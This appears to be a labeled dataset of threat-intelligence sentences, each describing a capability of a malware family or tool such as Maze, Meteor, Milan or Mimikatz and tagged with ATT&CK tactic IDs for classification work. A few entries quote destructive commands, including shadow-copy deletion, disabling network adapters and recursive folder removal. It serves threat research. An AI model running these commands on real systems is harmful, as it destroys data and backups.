Manjusaka data exfiltration takes place over HTTP channels.,['TA0010:Exfiltration']
Manjusaka can gather information about specific files on the victim system.,['TA0007:Discovery']
Manjusaka can take screenshots of the victim desktop.,['TA0009:Collection']
Manjusaka communication includes a client-created session cookie with base64-encoded information representing information from the victim system.,['TA0011:Command and Control']
Manjusaka performs basic system profiling actions to fingerprint and register the victim system with the C2 controller.,['TA0007:Discovery']
"Manjusaka gathers information about current network connections, local and remote addresses associated with them, and associated processes.",['TA0007:Discovery']
Manjusaka has used HTTP for command and control communication.,['TA0011:Command and Control']
Manjusaka can execute arbitrary commands passed to it from the C2 controller via `cmd.exe /c`.,['TA0002:Execution']
MarkiRAT can use BITS Utility to connect with the C2 server.,"['TA0005:Defense Evasion', 'TA0003:Persistence']"
MarkiRAT can capture clipboard content.,['TA0009:Collection']
MarkiRAT can upload data from the victim's machine to the C2 server.,['TA0009:Collection']
MarkiRAT can exfiltrate locally stored data via its C2.,['TA0010:Exfiltration']
"MarkiRAT can look for files carrying specific extensions such as: .rtf, .doc, .docx, .xls, .xlsx, .ppt, .pptx, .pps, .ppsx, .txt, .gpg, .pkr, .kdbx, .key, and .jpb.",['TA0007:Discovery']
"MarkiRAT can download additional files and tools from its C2 server, including through the use of BITSAdmin.",['TA0011:Command and Control']
MarkiRAT can capture all keystrokes on a compromised host.,"['TA0009:Collection', 'TA0006:Credential Access']"
MarkiRAT can store collected data locally in a created .nfo file.,['TA0009:Collection']
MarkiRAT can masquerade as update.exe and svehost.exe; it has also mimicked legitimate Telegram and Chrome files.,['TA0005:Defense Evasion']
MarkiRAT can run the ShellExecuteW API via the Windows Command Shell.,['TA0002:Execution']
MarkiRAT can gather information from the Keepass password manager.,['TA0006:Credential Access']
MarkiRAT can search for different processes on a system.,['TA0007:Discovery']
MarkiRAT can drop its payload into the Startup directory to ensure it automatically runs when the compromised system is started.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
MarkiRAT can capture screenshots that are initially saved as ‘scr.jpg’.,['TA0009:Collection']
MarkiRAT can check for running processes on the victim’s machine to look for Kaspersky and Bitdefender antivirus products.,['TA0007:Discovery']
MarkiRAT can modify the shortcut that launches Telegram by replacing its path with the malicious payload to launch with the legitimate executable.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
MarkiRAT can check for the Telegram installation directory by enumerating the files on disk.,['TA0007:Discovery']
MarkiRAT can obtain the computer name from a compromised host.,['TA0007:Discovery']
MarkiRAT can use the GetKeyboardLayout API to check if a compromised host's keyboard is set to Persian.,['TA0007:Discovery']
MarkiRAT can retrieve the victim’s username.,['TA0007:Discovery']
MarkiRAT can initiate communication over HTTP/HTTPS for its C2 server.,['TA0011:Command and Control']
MarkiRAT can utilize cmd.exe to execute commands in a victim's environment.,['TA0002:Execution']
Matryoshka is capable of providing Meterpreter shell access.,['TA0002:Execution']
Matryoshka is capable of stealing Outlook passwords.,['TA0006:Credential Access']
Matryoshka uses DNS for C2.,['TA0011:Command and Control']
Matryoshka uses reflective DLL injection to inject the malicious library and execute the RAT.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Matryoshka is capable of keylogging.,"['TA0009:Collection', 'TA0006:Credential Access']"
Matryoshka obfuscates API function names using a substitute cipher combined with Base64 encoding.,['TA0005:Defense Evasion']
Matryoshka can establish persistence by adding Registry Run keys.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Matryoshka uses rundll32.exe in a Registry Run key value for execution as part of its persistence mechanism.,['TA0005:Defense Evasion']
"Matryoshka can establish persistence by adding a Scheduled Task named ""Microsoft Boost Kernel Optimization"".","['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Matryoshka is capable of performing screen captures.,['TA0009:Collection']
"Maze has inserted large blocks of junk code, including some components to decrypt strings and other important information for later in the encryption process.",['TA0005:Defense Evasion']
"Maze has disrupted systems by encrypting files on targeted machines, claiming to decrypt files if a ransom payment is made. Maze has used the ChaCha algorithm, based on Salsa20, and an RSA algorithm to encrypt files.",['TA0040:Impact']
"Maze has disabled dynamic analysis and other security tools including IDA debugger, x32dbg, and OllyDbg. It has also disabled Windows Defender's Real-Time Monitoring feature and attempted to disable endpoint protection services.",['TA0005:Defense Evasion']
"Maze has forged POST strings with a random choice from a list of possibilities including ""forum"", ""php"", ""view"", etc. while making connection with the C2, hindering detection efforts.",['TA0011:Command and Control']
Maze has injected the malware DLL into a target process.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
"Maze has used the “Wow64RevertWow64FsRedirection” function following attempts to delete the shadow volumes, in order to leave the system in the same state as it was prior to redirection.",['TA0005:Defense Evasion']
"Maze has attempted to delete the shadow volumes of infected machines, once before and once after the encryption process.",['TA0040:Impact']
"Maze operators have created scheduled tasks masquerading as ""Windows Update Security"", ""Windows Update Security Patches"", and ""Google Chrome Security Update"" designed to launch the ransomware.",['TA0005:Defense Evasion']
"Maze has delivered components for its ransomware attacks using MSI files, some of which have been executed from the command-line using msiexec.",['TA0005:Defense Evasion']
"Maze has used several Windows API functions throughout the encryption process including IsDebuggerPresent, TerminateProcess, Process32FirstW, among others.",['TA0002:Execution']
Maze has decrypted strings and other important information during the encryption process. Maze also calls certain functions dynamically to hinder analysis.,['TA0005:Defense Evasion']
Maze has gathered all of the running system processes.,['TA0007:Discovery']
"Maze has created a file named ""startup_vrun.bat"" in the Startup folder of a virtual machine to establish persistence.","['TA0003:Persistence', 'TA0004:Privilege Escalation']"
"Maze operators have used VirtualBox and a Windows 7 virtual machine to run the ransomware; the virtual machine's configuration file mapped the shared network drives of the target company, presumably so Maze can encrypt files on the shared drives as well as the local machine.",['TA0005:Defense Evasion']
"Maze has created scheduled tasks using name variants such as ""Windows Update Security"", ""Windows Update Security Patches"", and ""Google Chrome Security Update"", to launch Maze at a specific time.","['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Maze has stopped SQL services to ensure it can encrypt any database.,['TA0040:Impact']
"Maze has checked the language of the infected system using the ""GetUSerDefaultUILanguage"" function.",['TA0007:Discovery']
Maze has checked the language of the machine with function GetUserDefaultUILanguage and terminated execution if the language matches with an entry in the predefined list.,['TA0007:Discovery']
"Maze has used the ""WNetOpenEnumW"", ""WNetEnumResourceW”, “WNetCloseEnum” and “WNetAddConnection2W” functions to enumerate the network resources on the infected machine.",['TA0007:Discovery']
"Maze has issued a shutdown command on a victim machine that, upon reboot, will run the ransomware within a VM.",['TA0040:Impact']
Maze has communicated to hard-coded IP addresses via HTTP.,['TA0011:Command and Control']
The Maze encryption process has used batch scripts with various commands.,['TA0002:Execution']
"Maze has used WMI to attempt to delete the shadow volumes on a machine, and to connect a virtual machine to the network domain of the victim organization's network.",['TA0002:Execution']
MechaFlounder has the ability to send the compromised user's account name and hostname within a URL to C2.,['TA0010:Exfiltration']
MechaFlounder has the ability to upload and download files to and from a compromised host.,['TA0011:Command and Control']
"MechaFlounder has been downloaded as a file named lsass.exe, which matches the legitimate Windows file.",['TA0005:Defense Evasion']
MechaFlounder uses a python-based payload.,['TA0002:Execution']
MechaFlounder has the ability to use base16 encoded strings in C2.,['TA0011:Command and Control']
MechaFlounder has the ability to identify the username and hostname on a compromised host.,['TA0007:Discovery']
MechaFlounder has the ability to use HTTP in communication with C2.,['TA0011:Command and Control']
MechaFlounder has the ability to run commands on a compromised host.,['TA0002:Execution']
MegaCortex can enable SeDebugPrivilege and adjust token privileges.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
MegaCortex has changed user account passwords and logged users off the system.,['TA0040:Impact']
MegaCortex has used code signing certificates issued to fake companies to bypass security controls.,['TA0042:Resource Development']
"MegaCortex has used the open-source library, Mbed Crypto, and generated AES keys to carry out the file encryption process.",['TA0040:Impact']
MegaCortex has used a Base64 key to decode its components.,['TA0005:Defense Evasion']
MegaCortex was used to kill endpoint security processes.,['TA0005:Defense Evasion']
MegaCortex can wipe deleted data from all drives using cipher.exe.,['TA0040:Impact']
MegaCortex loads injecthelper.dll into a newly created rundll32.exe process.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
MegaCortex can parse the available drives and directories to determine which files to encrypt.,['TA0007:Discovery']
MegaCortex has deleted volume shadow copies using vssadmin.exe.,['TA0040:Impact']
MegaCortex has added entries to the Registry for ransom contact information.,['TA0005:Defense Evasion']
"After escalating privileges, MegaCortex calls TerminateProcess, CreateRemoteThread, and other Win32 APIs.",['TA0002:Execution']
MegaCortex has used rundll32.exe to load a DLL for file encryption.,['TA0005:Defense Evasion']
MegaCortex can stop and disable services on the system.,['TA0040:Impact']
MegaCortex has checked the number of CPUs in the system to avoid being run in a sandbox or emulator.,"['TA0005:Defense Evasion', 'TA0007:Discovery']"
MegaCortex has used .cmd scripts on the victim's system.,['TA0002:Execution']
Melcoz has been distributed through an AutoIt loader script.,['TA0002:Execution']
Melcoz can monitor the victim's browser for online banking sessions and display an overlay window to manipulate the session in the background.,['TA0009:Collection']
Melcoz can monitor content saved to the clipboard.,['TA0009:Collection']
Melcoz has the ability to steal credentials from web browsers.,['TA0006:Credential Access']
Melcoz can use DLL hijacking to bypass security controls.,"['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Melcoz has the ability to download additional files to a compromised host.,['TA0011:Command and Control']
Melcoz has gained execution through victims opening malicious links.,['TA0002:Execution']
Melcoz can use MSI files with embedded VBScript for execution.,['TA0005:Defense Evasion']
Melcoz has been packed with VMProtect and Themida.,['TA0005:Defense Evasion']
Melcoz has been spread through malicious links embedded in e-mails.,['TA0001:Initial Access']
Melcoz can monitor the clipboard for cryptocurrency addresses and change the intended address to one controlled by the adversary.,['TA0040:Impact']
Melcoz can use VBS scripts to execute malicious DLLs.,['TA0002:Execution']
Metamorfo can enumerate all windows on the victim’s machine.,['TA0007:Discovery']
Metamorfo's C2 communication has been encrypted using OpenSSL.,['TA0011:Command and Control']
"Metamorfo has automatically collected mouse clicks, continuous screenshots on the machine, and set timers to collect the contents of the clipboard and website browsing.",['TA0009:Collection']
Metamorfo has a function to hijack data from the clipboard by monitoring the contents of the clipboard and replacing the cryptocurrency wallet with the attacker's.,['TA0009:Collection']
Metamorfo has digitally signed executables using AVAST Software certificates.,['TA0005:Defense Evasion']
Metamorfo has side-loaded its malicious DLL file.,"['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Metamorfo has used YouTube to store and hide C&C server domains.,['TA0011:Command and Control']
"Upon execution, Metamorfo has unzipped itself after being downloaded to the system and has performed string decryption.",['TA0005:Defense Evasion']
Metamorfo has a function to kill processes associated with defenses and can prevent certain processes from launching.,['TA0005:Defense Evasion']
Metamorfo has injected a malicious DLL into the Windows Media Player process .,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Metamorfo has encrypted payloads and strings.,['TA0005:Defense Evasion']
Metamorfo can send the data it collects to the C2 server.,['TA0010:Exfiltration']
Metamorfo has deleted itself from the system after execution.,['TA0005:Defense Evasion']
Metamorfo has searched the Program Files directories for specific folders and has searched for strings related to its mutexes.,['TA0007:Discovery']
Metamorfo has displayed fake forms on top of banking sites to intercept credentials from victims.,"['TA0009:Collection', 'TA0006:Credential Access']"
Metamorfo has hidden its GUI using the ShowWindow WINAPI call.,['TA0005:Defense Evasion']
"Metamorfo has a command to delete a Registry key it uses, \Software\Microsoft\Internet Explorer\notes.",['TA0005:Defense Evasion']
Metamorfo has used MSI files to download additional files to execute.,['TA0011:Command and Control']
Metamorfo includes payloads written in JavaScript.,['TA0002:Execution']
Metamorfo has a command to launch a keylogger and capture keystrokes on the victim’s machine.,"['TA0009:Collection', 'TA0006:Credential Access']"
Metamorfo requires the user to double-click the executable to run the malicious HTA file or to download a malicious installer.,['TA0002:Execution']
"Metamorfo has disguised an MSI file as the Adobe Acrobat Reader Installer and has masqueraded payloads as OneDrive, WhatsApp, or Spotify, for example.",['TA0005:Defense Evasion']
"Metamorfo has written process names to the Registry, disabled IE browser features, deleted Registry keys, and changed the ExtendedUIHoverTime key.",['TA0005:Defense Evasion']
Metamorfo has used mshta.exe to execute a HTA payload.,['TA0005:Defense Evasion']
Metamorfo has used MsiExec.exe to automatically execute files.,['TA0005:Defense Evasion']
Metamorfo has used native WINAPI calls.,['TA0002:Execution']
Metamorfo has used raw TCP for C2.,['TA0011:Command and Control']
Metamorfo has communicated with hosts over raw TCP on port 9999.,['TA0011:Command and Control']
Metamorfo has downloaded a zip file for execution on the system.,['TA0011:Command and Control']
Metamorfo has performed process name checks and has monitored applications.,['TA0007:Discovery']
"Metamorfo has configured persistence to the Registry key HKCU\Software\Microsoft\Windows\CurrentVersion\Run, Spotify =% APPDATA%\Spotify\Spotify.exe and used .LNK files in the startup folder to achieve persistence.","['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Metamorfo can collect screenshots of the victim’s machine.,['TA0009:Collection']
Metamorfo collects a list of installed antivirus software from the victim’s system.,['TA0007:Discovery']
Metamorfo had used AutoIt to load and execute the DLL payload.,['TA0002:Execution']
Metamorfo has searched the compromised system for banking applications.,['TA0007:Discovery']
Metamorfo has used VMProtect to pack and protect files.,['TA0005:Defense Evasion']
Metamorfo has been delivered to victims via emails with malicious HTML attachments.,['TA0001:Initial Access']
Metamorfo has encrypted C2 commands with AES-256.,['TA0011:Command and Control']
Metamorfo has collected the hostname and operating system version from the compromised host.,['TA0007:Discovery']
Metamorfo has collected the username from the victim's machine.,['TA0007:Discovery']
Metamorfo uses JavaScript to get the system time.,['TA0007:Discovery']
"Metamorfo has a function that can watch the contents of the system clipboard for valid bitcoin addresses, which it then overwrites with the attacker's address.",['TA0040:Impact']
"Metamorfo has embedded a ""vmdetect.exe"" executable to identify virtual machines at the beginning of execution.","['TA0005:Defense Evasion', 'TA0007:Discovery']"
Metamorfo has used VBS code on victims’ systems.,['TA0002:Execution']
Metamorfo has used HTTP for C2.,['TA0011:Command and Control']
Metamorfo has used cmd.exe /c to execute files.,['TA0002:Execution']
Meteor has the ability to change the password of local users on compromised hosts and can log off users.,['TA0040:Impact']
"Meteor can use Wevtutil to remove Security, System and Application Event Viewer logs.",['TA0005:Defense Evasion']
Meteor can fill a victim's files and directories with zero-bytes in replacement of real content before deleting them.,['TA0040:Impact']
Meteor can attempt to uninstall Kaspersky Antivirus or remove the Kaspersky license; it can also add all files and folders related to the attack to the Windows Defender exclusion list.,['TA0005:Defense Evasion']
"Meteor will delete the folder containing malicious scripts if it detects the hostname as `PIS-APP`, `PIS-MOB`, `WSUSPROXY`, or `PIS-DB`.",['TA0005:Defense Evasion']
Meteor can use group policy to push a scheduled task from the AD to all network machines.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Meteor can hide its console window upon execution to decrease its visibility to a victim.,['TA0005:Defense Evasion']
Meteor has the ability to download additional files for execution on the victim's machine.,['TA0011:Command and Control']
Meteor can use `bcdedit` to delete different boot identifiers on a compromised host; it can also use `vssadmin.exe delete shadows /all /quiet` and `C:\\Windows\\system32\\wbem\\wmic.exe shadowcopy delete`.,['TA0040:Impact']
Meteor can change both the desktop wallpaper and the lock screen image to a custom image.,['TA0040:Impact']
Meteor has been disguised as the Windows Power Efficiency Diagnostics report tool.,['TA0005:Defense Evasion']
Meteor can use `WinAPI` to remove a victim machine from an Active Directory domain.,['TA0002:Execution']
Meteor can use PowerShell commands to disable the network adapters on a victim machines.,['TA0002:Execution']
"Meteor can check if a specific process is running, such as Kaspersky's `avp.exe`.",['TA0007:Discovery']
Meteor execution begins from a scheduled task named `Microsoft\Windows\Power Efficiency Diagnostics\AnalyzeAll` and it creates a separate scheduled task called `mstask` to run the wiper only once at 23:55:00.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Meteor has the ability to search for Kaspersky Antivirus on a victim's machine.,['TA0007:Discovery']
"Meteor can disconnect all network adapters on a compromised host using `powershell -Command ""Get-WmiObject -class Win32_NetworkAdapter | ForEach { If { $.Disable } }"" > NUL`.",['TA0040:Impact']
Meteor has the ability to discover the hostname of a compromised host.,['TA0007:Discovery']
"Meteor can run `set.bat`, `update.bat`, `cache.bat`, `bcd.bat`, `msrun.bat`, and similar scripts.",['TA0002:Execution']
Meteor can use `wmic.exe` as part of its effort to delete shadow copies.,['TA0002:Execution']
MgBot can capture input and output audio streams from infected devices.,['TA0009:Collection']
MgBot can capture clipboard data.,['TA0009:Collection']
MgBot includes modules for stealing stored credentials from Outlook and Foxmail email client software.,['TA0006:Credential Access']
"MgBot includes modules for stealing credentials from various browsers and applications, including Chrome, Opera, Firefox, Foxmail, QQBrowser, FileZilla, and WinSCP.",['TA0006:Credential Access']
MgBot includes a module capable of stealing content from the Tencent QQ database storing user QQ message history on infected devices.,['TA0009:Collection']
MgBot includes modules for collecting files from local systems based on a given set of properties and filenames.,['TA0009:Collection']
MgBot includes modules capable of gathering information from USB thumb drives and CD-ROMs on the victim machine given a list of provided criteria.,['TA0009:Collection']
MgBot includes modules for collecting information on Active Directory domain accounts.,['TA0007:Discovery']
MgBot includes modules for collecting information on local domain users and permissions.,['TA0007:Discovery']
MgBot includes keylogger payloads focused on the QQ chat application.,"['TA0009:Collection', 'TA0006:Credential Access']"
MgBot includes modules for identifying local administrator accounts on victim systems.,['TA0007:Discovery']
MgBot includes modules for performing HTTP and server service scans.,['TA0007:Discovery']
MgBot includes modules for dumping and capturing credentials from process memory.,['TA0006:Credential Access']
"MgBot includes a module for establishing a process watchdog for itself, identifying if the MgBot process is still running.",['TA0007:Discovery']
MgBot includes modules for performing ARP scans of local connected systems.,['TA0007:Discovery']
"MgBot includes modules that can steal cookies from Firefox, Chrome, and Edge web browsers.",['TA0006:Credential Access']
MgBot includes modules for identifying local users and administrators on victim machines.,['TA0007:Discovery']
Micropsia creates a RAR archive based on collected files on the victim's machine.,['TA0009:Collection']
Micropsia can perform microphone recording.,['TA0009:Collection']
Micropsia executes an RAR tool to recursively archive files based on a predefined list of file extensions .,['TA0009:Collection']
Micropsia obfuscates the configuration with a custom Base64 and XOR.,['TA0005:Defense Evasion']
Micropsia can perform a recursive directory listing for all volume drives available on the victim's machine and can also fetch specific files by their paths.,['TA0007:Discovery']
Micropsia creates a new hidden directory to store all components' outputs in a dedicated sub-folder for each.,['TA0005:Defense Evasion']
Micropsia can download and execute an executable from the C2 server.,['TA0011:Command and Control']
Micropsia has keylogging capabilities.,"['TA0009:Collection', 'TA0006:Credential Access']"
Micropsia takes screenshots every 90 seconds by calling the Gdi32.BitBlt API.,['TA0009:Collection']
Micropsia searches for anti-virus software and firewall products installed on the victim’s machine using WMI.,['TA0007:Discovery']
Micropsia creates a shortcut to maintain persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Micropsia gathers the hostname and OS version from the victim’s machine.,['TA0007:Discovery']
Micropsia collects the username from the victim’s machine.,['TA0007:Discovery']
Micropsia uses HTTP and HTTPS for C2 network communications.,['TA0011:Command and Control']
Micropsia creates a command-line shell using cmd.exe.,['TA0002:Execution']
Micropsia searches for anti-virus software and firewall products installed on the victim’s machine using WMI.,['TA0002:Execution']
Milan can use a COM component to generate scheduled tasks.,['TA0002:Execution']
Milan has the ability to use DNS for C2 communications.,['TA0011:Command and Control']
Milan can upload files from a compromised host.,['TA0009:Collection']
Milan can use hardcoded domains as an input for domain generation algorithms.,['TA0011:Command and Control']
Milan has used an executable named `companycatalog.exe.config` to appear benign.,['TA0005:Defense Evasion']
Milan can encode files containing information about the targeted system.,['TA0005:Defense Evasion']
Milan can delete files via `C:\Windows\system32\cmd.exe /c ping 1.1.1.1 -n 1 -w 3000 > Nul & rmdir /s /q`.,['TA0005:Defense Evasion']
Milan has received files from C2 and stored them in log folders beginning with the character sequence `a9850d2f`.,['TA0011:Command and Control']
Milan has run `C:\Windows\system32\cmd.exe /c cmd /c dir c:\users\ /s 2>&1` to discover local accounts.,['TA0007:Discovery']
Milan has saved files prior to upload from a compromised host to folders beginning with the characters `a9850d2f`.,['TA0009:Collection']
Milan has used an executable named `companycatalogue` to appear benign.,['TA0005:Defense Evasion']
Milan can use the API `DnsQuery_A` for DNS resolution.,['TA0002:Execution']
Milan can use a custom protocol tunneled through DNS or HTTP.,['TA0011:Command and Control']
Milan can query `HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid` to retrieve the machine GUID.,['TA0007:Discovery']
Milan can establish persistence on a targeted host with scheduled tasks.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Milan can enumerate the targeted machine's name and GUID.,['TA0007:Discovery']
Milan can run `C:\Windows\system32\cmd.exe /c cmd /c ipconfig /all 2>&1` to discover network settings.,['TA0007:Discovery']
Milan can identify users registered to a targeted machine.,['TA0007:Discovery']
Milan can use HTTPS for communication with C2.,['TA0011:Command and Control']
Milan can use `cmd.exe` for discovery actions on a targeted system.,['TA0002:Execution']
MimiPenguin can use the `/maps` and `/mem` file to search for regex patterns and dump the process memory.,['TA0006:Credential Access']
The Mimikatz credential dumper has been extended to include Skeleton Key domain controller authentication bypass functionality. The LSADUMP::ChangeNTLM and LSADUMP::SetNTLM modules can also manipulate the password hash of an account without knowing the clear text value.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
"Mimikatz performs credential dumping to obtain account and password information useful in gaining access to additional systems and enterprise network resources. It contains functionality to acquire information about credentials in many ways, including from the credential vault and DPAPI.",['TA0006:Credential Access']
"Mimikatz performs credential dumping to obtain account and password information useful in gaining access to additional systems and enterprise network resources. It contains functionality to acquire information about credentials in many ways, including from DPAPI.",['TA0006:Credential Access']
"Mimikatz performs credential dumping to obtain account and password information useful in gaining access to additional systems and enterprise network resources. It contains functionality to acquire information about credentials in many ways, including from DCSync/NetSync.",['TA0006:Credential Access']
Mimikatz's kerberos module can create golden tickets.,['TA0006:Credential Access']
"Mimikatz performs credential dumping to obtain account and password information useful in gaining access to additional systems and enterprise network resources. It contains functionality to acquire information about credentials in many ways, including from the LSA.",['TA0006:Credential Access']
"Mimikatz performs credential dumping to obtain account and password information useful in gaining access to additional systems and enterprise network resources. It contains functionality to acquire information about credentials in many ways, including from the LSASS Memory.",['TA0006:Credential Access']
"Mimikatz's SEKURLSA::Pth module can impersonate a user, with only a password hash, to execute arbitrary commands.","['TA0005:Defense Evasion', 'TA0008:Lateral Movement']"
Mimikatz’s LSADUMP::DCSync and KERBEROS::PTT modules implement the three steps required to extract the krbtgt account hash and create/use Kerberos tickets.,"['TA0005:Defense Evasion', 'TA0008:Lateral Movement']"
Mimikatz's CRYPTO::Extract module can extract keys by interacting with Windows cryptographic application programming interface functions.,['TA0006:Credential Access']
Mimikatz’s LSADUMP::DCShadow module can be used to make AD updates by temporarily setting a computer to be a DC.,['TA0005:Defense Evasion']
Mimikatz's MISC::AddSid module can append any SID or user/group account to a user's SID-History. Mimikatz also utilizes SID-History Injection to expand the scope of other components such as generated Kerberos Golden Tickets and DCSync beyond a single domain.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
"Mimikatz performs credential dumping to obtain account and password information useful in gaining access to additional systems and enterprise network resources. It contains functionality to acquire information about credentials in many ways, including from the SAM table.",['TA0006:Credential Access']
The Mimikatz credential dumper contains an implementation of an SSP.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Mimikatz's kerberos module can create silver tickets.,['TA0006:Credential Access']
Mimikatz's `CRYPTO` module can create and export various types of authentication certificates.,['TA0006:Credential Access']
Mimikatz contains functionality to acquire credentials from the Windows Credential Manager.,['TA0006:Credential Access']
Miner-C copies itself into the public folder of Network Attached Storage devices and infects new victims who open the file.,['TA0008:Lateral Movement']
Some MiniDuke components use Twitter to initially obtain the address of a C2 server or as a backup if no hard-coded C2 server responds.,['TA0011:Command and Control']
MiniDuke can use DGA to generate new Twitter URLs for C2.,['TA0011:Command and Control']
MiniDuke uses Google Search to identify C2 servers if its primary C2 method via Twitter is not working.,['TA0011:Command and Control']
MiniDuke can enumerate local drives.,['TA0007:Discovery']
MiniDuke can download additional encrypted backdoors onto the victim via GIF files.,['TA0011:Command and Control']
MiniDuke can can use a named pipe to forward communications from one compromised machine with internet access to other compromised machines.,['TA0011:Command and Control']
MiniDuke can use control flow flattening to obscure code.,['TA0005:Defense Evasion']
MiniDuke can gather the hostname on a compromised machine.,['TA0007:Discovery']
MiniDuke uses HTTP and HTTPS for command and control.,['TA0011:Command and Control']
MirageFox is likely loaded via DLL hijacking into a legitimate McAfee binary.,"['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
MirageFox has a function for decrypting data containing C2 configuration information.,['TA0005:Defense Evasion']
MirageFox can collect CPU and architecture information from the victim’s machine.,['TA0007:Discovery']
MirageFox can gather the username from the victim’s machine.,['TA0007:Discovery']
MirageFox has the capability to execute commands using cmd.exe.,['TA0002:Execution']
"Mis-Type has created registry keys for persistence, including `HKCU\Software\bkfouerioyou`, `HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{6afa8072-b2b1-31a8-b5c1-{Unique Identifier}`, and `HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{3BF41072-B2B1-31A8-B5C1-{Unique Identifier}`.","['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Mis-Type has collected files and data from a compromised host.,['TA0009:Collection']
Mis-Type has transmitted collected files and data to its C2 server.,['TA0010:Exfiltration']
"Mis-Type first attempts to use a Base64-encoded network protocol over a raw TCP socket for C2, and if that method fails, falls back to a secondary HTTP-based protocol to communicate to an alternate C2 server.",['TA0011:Command and Control']
Mis-Type has downloaded additional malware and files onto a compromised host.,['TA0011:Command and Control']
Mis-Type may create a file containing the results of the command cmd.exe /c net user {Username}.,['TA0007:Discovery']
Mis-Type may create a temporary user on the system named `Lost_{Unique Identifier}`.,['TA0003:Persistence']
Mis-Type has temporarily stored collected information to the files `“%AppData%\{Unique Identifier}\HOSTRURKLSR”` and `“%AppData%\{Unique Identifier}\NEWERSSEMP”`.,['TA0009:Collection']
"Mis-Type saves itself as a file named `msdtc.exe`, which is also the name of the legitimate Microsoft Distributed Transaction Coordinator service binary.",['TA0005:Defense Evasion']
"Mis-Type has used Windows API calls, including `NetUserAdd` and `NetUserDel`.",['TA0002:Execution']
Mis-Type network traffic can communicate over a raw socket.,['TA0011:Command and Control']
"Mis-Type has been injected directly into a running process, including `explorer.exe`.","['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Mis-Type uses Base64 encoding for C2 traffic.,['TA0011:Command and Control']
The initial beacon packet for Mis-Type contains the operating system version and file system of the victim.,['TA0007:Discovery']
Mis-Type may create a file containing the results of the command cmd.exe /c ipconfig /all.,['TA0007:Discovery']
Mis-Type runs tests to determine the privilege level of the compromised user.,['TA0007:Discovery']
Mis-Type network traffic can communicate over HTTP.,['TA0011:Command and Control']
Mis-Type has used `cmd.exe` to run commands on a compromised host.,['TA0002:Execution']
"Misdat has created registry keys for persistence, including `HKCU\Software\dnimtsoleht\StubPath`, `HKCU\Software\snimtsOleht\StubPath`, `HKCU\Software\Backtsaleht\StubPath`, `HKLM\SOFTWARE\Microsoft\Active Setup\Installed. Components\{3bf41072-b2b1-21c8-b5c1-bd56d32fbda7}`, and `HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{3ef41072-a2f1-21c8-c5c1-70c2c3bc7905}`.","['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Misdat is capable of deleting Registry keys used for persistence.,['TA0005:Defense Evasion']
Misdat has collected files and data from a compromised host.,['TA0009:Collection']
Misdat has uploaded files and data to its C2 servers.,['TA0010:Exfiltration']
Misdat is capable of deleting the backdoor file.,['TA0005:Defense Evasion']
"Misdat is capable of running commands to obtain a list of files and directories, as well as enumerating logical drives.",['TA0007:Discovery']
Misdat is capable of downloading files from the C2.,['TA0011:Command and Control']
"Misdat saves itself as a file named `msdtc.exe`, which is also the name of the legitimate Microsoft Distributed Transaction Coordinator service binary.",['TA0005:Defense Evasion']
"Misdat has used Windows APIs, including `ExitWindowsEx` and `GetKeyboardType`.",['TA0002:Execution']
Misdat network traffic communicates over a raw socket.,['TA0011:Command and Control']
Misdat was typically packed using UPX.,['TA0005:Defense Evasion']
Misdat network traffic is Base64-encoded plaintext.,['TA0011:Command and Control']
The initial beacon packet for Misdat contains the operating system version of the victim.,['TA0007:Discovery']
Misdat has attempted to detect if a compromised host had a Japanese keyboard via the Windows API call `GetKeyboardType`.,['TA0007:Discovery']
"Many Misdat samples were programmed using Borland Delphi, which will mangle the default PE compile timestamp of a file.",['TA0005:Defense Evasion']
Misdat is capable of providing shell functionality to the attacker to execute commands.,['TA0002:Execution']
Mispadu contains a copy of the OpenSSL library to encrypt C2 traffic.,['TA0011:Command and Control']
Mispadu utilizes malicious Google Chrome browser extensions to steal financial data.,['TA0003:Persistence']
Mispadu can monitor browser activity for online banking actions and display full-screen overlay images to block user access to the intended site or present additional data fields.,['TA0007:Discovery']
Mispadu has the ability to capture and replace Bitcoin wallet data in the clipboard on a compromised host.,['TA0009:Collection']
Mispadu has obtained credentials from mail clients via NirSoft MailPassView.,['TA0006:Credential Access']
Mispadu can steal credentials from Google Chrome.,['TA0006:Credential Access']
Mispadu decrypts its encrypted configuration files prior to execution.,['TA0005:Defense Evasion']
Mispadu uses a custom algorithm to obfuscate its internal strings and uses hardcoded keys. Mispadu also uses encoded configuration files and has encoded payloads using Base64.,['TA0005:Defense Evasion']
Mispadu can sends the collected financial data to the C2 server.,['TA0010:Exfiltration']
Mispadu searches for various filesystem paths to determine what banking applications are installed on the victim’s machine.,['TA0007:Discovery']
Mispadu can monitor browser activity for online banking actions and display full-screen overlay images to block user access to the intended site or present additional data fields.,"['TA0009:Collection', 'TA0006:Credential Access']"
